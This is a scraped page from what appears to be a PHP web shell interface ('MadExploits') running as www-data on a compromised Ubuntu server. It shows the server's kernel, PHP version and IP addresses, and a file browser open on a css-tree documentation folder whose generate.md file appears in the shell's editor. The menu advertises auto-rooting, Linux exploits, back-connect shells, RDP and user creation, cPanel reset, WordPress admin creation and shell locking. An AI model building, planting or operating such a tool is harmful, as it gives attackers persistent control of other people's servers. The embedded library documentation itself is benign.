Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
css-tree /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
.DS_Store
6
KB
-rw-r--r--
Lexer.md
22
B
-rw-r--r--
List.md
2.42
KB
-rw-r--r--
Tokenizer.md
3.48
KB
-rw-r--r--
api-map.svg
41.53
KB
-rw-r--r--
ast.md
9.59
KB
-rw-r--r--
generate.md
875
B
-rw-r--r--
parsing.md
7.03
KB
-rw-r--r--
readme.md
266
B
-rw-r--r--
supported.md
10.6
KB
-rw-r--r--
syntax.md
39
B
-rw-r--r--
traversal.md
7.96
KB
-rw-r--r--
utils.md
3.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : generate.md
# Translate AST to string ## generate(ast[, options]) Generates a CSS string for given AST. ```js // generate with default settings csstree.generate(ast); // generate with options csstree.generate(ast, { sourceMap: true }); ``` Options (optional): <!-- MarkdownTOC --> - [sourceMap](#sourcemap) - [decorator](#decorator) <!-- /MarkdownTOC --> ### sourceMap Type: `boolean` Default: `false` Generates a source map (nodes should contain positions in `loc` property). Note, that an object instead of string is returned in that case. ```js var ast = csstree.parse('.test { color: red }', { filename: 'my.css', positions: true }); var result = csstree.generate(ast, { sourceMap: true }); // { css: '.test{color:red}', map: SourceMapGenerator {} } ``` ### decorator Type: `function` Default: none A function that a handlers used by a generator. TBD
Close